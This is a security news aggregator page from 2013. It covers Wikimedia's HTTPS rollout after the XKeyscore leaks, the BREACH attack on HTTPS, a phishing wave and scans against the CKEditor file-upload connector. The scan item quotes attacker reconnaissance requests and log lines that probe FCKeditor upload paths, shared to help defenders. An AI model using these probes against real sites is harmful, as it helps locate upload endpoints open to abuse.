Information Security News
FileTrek Survey Reveals That Black Hat Attendees' Opinions Split On
The Black Hat USA conference is attended by sophisticated hackers, security experts and leaders from all areas of the infosec community including corporate, government, academic, and researchers. The conference was held in Las Vegas, Nevada at ...
by Sean Gallagher
In the wake of revelations about the National Security Agency's ability to broadly capture, index, and search the contents of unencrypted Web traffic, the Wikimedia Foundation is speeding up efforts to use secure Hypertext Transfer Protocol (HTTPS) by default for site visitors and editors for Wikipedia and other Wikimedia projects. But users will need to have accounts on the foundation's sites to get that protection.
"Recent leaks of the NSA’s XKeyscore program have prompted our community members to push for the use of HTTPS by default for the Wikimedia projects," Wikimedia Foundation operations director Ryan Lane said in a blog post on August 1. "Thankfully, this is already a project that was being considered for this year’s official roadmap, and it has been on our unofficial roadmap since native HTTPS was enabled."
The XKeyscore program allows the NSA to perform searches against recent Internet traffic to find a variety of data, including the raw HTTP requests made by users. These data could encompass searches on sites, content posted to those sites, and other interactions with Web pages not secured by encryption. While sites such as Google and Facebook offer connections over HTTPS as an option (Google uses it by default when users are logged in, and Facebook turned on default HTTPS just one day ago), most sites on the Internet don't use HTTPS for a variety of technical reasons—including hosting configurations, increased server-side processing requirements, and the use of third-party services that fail under HTTPS. That means that traffic to most websites can be captured by XKeyscore's packet capture system.
Less than 24 hours after researchers disclosed a new attack that can pluck secrets from webpages protected by the widely used HTTPS encryption scheme, the US Department of Homeland Security is advising website operators to investigate whether they're susceptible.
As Ars reported Thursday, an exploit dubbed BREACH—short for Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext—can decode e-mail addresses, certain types of security tokens, and other secrets from encrypted webpages, often in as little as 30 seconds. The attack builds on a previously developed technique known as CRIME, which manipulated data compression to glean clues about the plain-text contents of encrypted payloads. CRIME vulnerabilities were mitigated by disabling TLS compression and modifying the way the Google-developed compression known as SPDY worked. But as both CERT and the developers of BREACH have said, the new attack is much harder to protect against.
"We are currently unaware of a practical solution to this problem," the CERT advisory stated. "However, the reporters offer several tactics for mitigating this vulnerability. Some of these mitigations may protect entire applications, while others may only protect individual webpages."
Right now we are seeing fake American Express account alerts. The alerts look very real, and will trick the user into clicking on a link that may lead to malware. As many of these attacks, the exact destination will heavily depend on the browser used.
Antivirus does recognize the intermediate scripts as malicious and should warn the user if configured to inspect web content.
(click on image for full size)
Johannes B. Ullrich, Ph.D.
We are seeing *a lot* of scans for the CKEditor file upload script. CKEditor (aka "FCKEditor") is a commonly used gui editor allowing users to edit HTML as part of a web application. Many web applications like wikis and bulletin boards use it. It provides the ability to upload files to web servers. The scans I have observed so far apper to focus on the file upload function, but many scans will just scan for the presence of the editor / file upload function and it is hard to tell what the attacker would do if the editor is found.
Here are some sample reports:
Full sample POST request:
GET /FCK/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F HTTP/1.1
ACCEPT: text/html, */*
USER-AGENT: Mozilla/3.0 (compatible; Indy Library)
Some sample Apache logs:
HEAD /FCKeditor/editor/filemanager/upload/test.html HEAD /admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html HEAD /admin/FCKeditor/editor/filemanager/connectors/test.html HEAD /admin/FCKeditor/editor/filemanager/connectors/uploadtest.html HEAD /admin/FCKeditor/editor/filemanager/upload/test.html HEAD /FCKeditor/editor/filemanager/browser/default/connectors/test.html HEAD /FCKeditor/editor/filemanager/connectors/test.html HEAD /FCKeditor/editor/filemanager/connectors/uploadtest.html HEAD /FCKeditor/editor/filemanager/upload/test.html
Posted by InfoSec News on Aug 02http://www.dailymail.co.uk/sciencetech/article-2383200/One-PINs-correctly-guessed-time-Research-reveals-20-commonly-used-numbers.html
Posted by InfoSec News on Aug 02http://healthitsecurity.com/2013/07/31/how-safe-is-minors-patient-data-from-hackers/
Posted by InfoSec News on Aug 02http://www.zdnet.com/researchers-reveal-details-of-active-comfoo-cyberespionage-campaign-7000018907/
Posted by InfoSec News on Aug 02http://www.theregister.co.uk/2013/08/02/pwnie_awards/
Posted by InfoSec News on Aug 02http://www.thesmokinggun.com/documents/colin-powell-guccifer-email-hack-594321
Snowden picks up 'Epic 0wnage' gong in Vegas... well, not literally
The honour was announced yesterday at the Pwnie awards, Infosec's equivalent to the Oscars. Jack, 35, died last Thursday just days before he was due to give a talk on electronic medical implants for humans at Black Hat. The slot at the Las Vegas ...